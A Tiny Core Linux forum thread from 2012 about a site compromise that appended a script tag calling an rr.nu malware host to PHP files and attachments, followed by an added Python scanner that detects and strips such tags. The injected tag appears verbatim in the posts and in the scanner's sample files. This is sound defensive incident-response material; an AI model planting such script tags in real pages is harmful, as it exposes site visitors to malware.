Tiny Core Linux

Off-Topic => Off-Topic - Tiny Core Lounge => Topic started by: u54749 on March 04, 2012, 12:07:46 PM

Title: Tinycore site possibly compromised?
Post by: u54749 on March 04, 2012, 12:07:46 PM
I got a couple of random redirects from the Tinycore site to hXXp://rmore79riveru.rr.nu today.

see also
http://blog.sucuri.net/2012/02/malware-campaign-from-rr-nu.html
http://www.haruhisuzumiya.net/haruhiforum//viewtopic.php?t=2108

as extra proof:
Download attachment "udev.log" from http://forum.tinycorelinux.net/index.php/topic,11396.msg60347.html#msg60347

It has a very suspect last line that absolutely does not belong in a log file. I suppose this line was not present in the originally uploaded file.
The line is:
"<script src="hXXp://rmore79riveru.rr.nu/nl.php?p=d"></script>"

Can somebody reconstruct/confirm this?
Title: Re: Tinycore site possibly compromised?
Post by: gutmensch on March 05, 2012, 07:33:58 AM
Many thanks for the pointer, this rr.nu redirection was indeed in many of the forum php files, which should be clean now... attachments seem to be clean as well, at least I didn't find any reference to rr.nu in them any more, so it must have been delivered while accessing and downloading them.
Title: Re: Tinycore site possibly compromised?
Post by: bmarkus on March 05, 2012, 07:58:44 AM
Many thanks for the pointer, this rr.nu redirection was indeed in many of the forum php files, which should be clean now... attachments seem to be clean as well, at least I didn't find any reference to rr.nu in them any more, so it must have been delivered while accessing and downloading them.

Do you know how these files got infected?
Title: Re: Tinycore site possibly compromised?
Post by: gutmensch on March 05, 2012, 08:05:51 AM
Do you know how these files got infected?
Nope. But it seems to have hit also wordpress and other php based installations... so I would guess it's got something to do with an admin account and maybe a hacked browser/OS, which triggers some "nice" update functions within SMF itself to spread the malware.
Title: Re: Tinycore site possibly compromised?
Post by: bmarkus on March 05, 2012, 08:42:56 AM
Do you know how these files got infected?
Nope. But it seems to have hit also wordpress and other php based installations... so I would guess it's got something to do with an admin account and maybe a hacked browser/OS, which triggers some "nice" update functions within SMF itself to spread the malware.

I had frequent infections a year ago with my SMF and other sites. In fact everything was infected and, judging by modification time, simply in ABC order. Code attached to HTML was working (I mean as the virus creator wanted), PHP only got damaged. It was easy to clean with a simple Python program, but it was reinfected soon.

In my case the FTP admin password was stolen and it simply logged in from outside with FTP. I can't prove it, but most likely a worm stole my admin password from Total Commander. Since I changed the admin password and do not store it in FTP clients, my sites are clean and have never been infected again.
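The indicator quoted in the first post (a `<script src="http://...rr.nu/nl.php?p=d"></script>` tag appended as the last line of PHP files and of a downloaded attachment) and the "simple Python program" bmarkus used for cleanup, as an added example; this is not code from the thread, from SMF or from Tiny Core. The scanner walks a web root, reports every file carrying such a tag, and with `--fix` strips the tag after saving an `.infected` copy of the file as evidence. It goes beyond the single URL seen in the thread: it matches any subdomain of each listed campaign domain, case-insensitively, and refuses look-alike hosts such as `rr.nu.evil.example`. The domain list, scanned suffixes, and the sample web root (file names and contents) are constructed for the demonstration.

```python
"""Find and strip the appended rr.nu <script> injection from a web tree.

Added example, not the forum's, SMF's or Tiny Core's own code.  The campaign
domain list, file suffixes and sample files below are constructed for the demo.
"""
import re
import shutil
import tempfile
from pathlib import Path

# Campaign hosts.  Extend the tuple for other campaigns; any subdomain of an
# entry is matched, a host that merely starts with it (rr.nu.evil.example) is not.
SUSPECT_DOMAINS = ("rr.nu",)

# The thread saw the tag in forum PHP files and in a downloaded .log attachment,
# so the scan must not be limited to web scripts.
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".txt", ".log"}

# The exact tag quoted in the thread, used for the constructed sample files.
TAG = '<script src="http://rmore79riveru.rr.nu/nl.php?p=d"></script>'


def build_pattern(domains=SUSPECT_DOMAINS):
    """Regex for a one-line <script> element whose src host is on `domains`.

    The campaign appended the whole tag on a single new line, so a per-line
    match is what the cleaner needs; a tag split across lines is not matched."""
    hosts = "|".join(re.escape(d) for d in domains)
    return re.compile(
        r"""<script\b[^>]*\bsrc\s*=\s*["']?https?://(?:[a-z0-9-]+\.)*(?:%s)"""
        r"""(?=[/?"'\s>])(?:[/?][^"'\s>]*)?["']?[^>]*>\s*</script>""" % hosts,
        re.IGNORECASE,
    )


def find_injections(text, pattern=None):
    """Return [(line_number, matched_tag), ...] for every injected tag in `text`."""
    pattern = pattern or build_pattern()
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        for match in pattern.finditer(line):
            hits.append((number, match.group(0)))
    return hits


def clean_text(text, pattern=None):
    """Strip injected tags; return (cleaned_text, tags_removed).

    A line that held nothing but the tag (the usual case: it was appended as a
    new last line) is dropped entirely, so the result matches the pre-infection
    file byte for byte.  This also repairs a PHP file that had no closing ?>,
    where the appended tag landed inside the code and broke the parse."""
    pattern = pattern or build_pattern()
    out, removed = [], 0
    for line in text.splitlines(keepends=True):
        new, n = pattern.subn("", line)
        removed += n
        if n and not new.strip():
            continue
        out.append(new)
    return "".join(out), removed


def scan_tree(root, fix=False, pattern=None, suffixes=SCAN_SUFFIXES):
    """Walk `root`; return {relative_path: tags_removed} for infected files.

    With fix=True each infected file is first copied to <name>.infected (keep
    it: content and mtime show what was written and when) and then rewritten
    without the tags.  The copy's suffix keeps it out of later scans."""
    pattern = pattern or build_pattern()
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        text = path.read_text(encoding="utf-8", errors="surrogateescape")
        cleaned, n = clean_text(text, pattern)
        if not n:
            continue
        report[str(path.relative_to(root))] = n
        if fix:
            shutil.copy2(path, path.with_name(path.name + ".infected"))
            path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return report


# Constructed sample web root: two PHP files and one attachment carry the tag.
SAMPLE_FILES = {
    "index.php": "<?php\necho 'hello';\n?>\n" + TAG + "\n",
    "attachments/udev.log": "udevd[42]: starting\nudevd[42]: done\n" + TAG + "\n",
    "clean.php": "<?php\necho 'clean';\n",
    "Sources/Post.php": "<?php\nfunction f() {}\n" + TAG + "\n",  # no ?> : parse broken
}


def make_sample_root(root=None):
    """Write SAMPLE_FILES under `root` (a fresh temp dir by default); return its Path."""
    root = Path(root or tempfile.mkdtemp())
    for rel, body in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root


if __name__ == "__main__":
    import sys
    args = [a for a in sys.argv[1:] if a != "--fix"]
    root = Path(args[0]) if args else make_sample_root()
    report = scan_tree(root, fix="--fix" in sys.argv or not args)
    for rel, n in report.items():
        print(f"{rel}: {n} injected tag(s)")
    print(f"{len(report)} infected file(s) under {root}")
```

Run it as `python scan_rrnu.py /var/www/forum` to report only, and add `--fix` to clean; with no arguments it builds the sample tree in a temp directory and cleans that. As the thread's last post makes clear, stripping the tags is only half the job: the files were rewritten with a stolen FTP credential, so the password has to be rotated and the client that stored it cleaned, or the tree is reinfected within days.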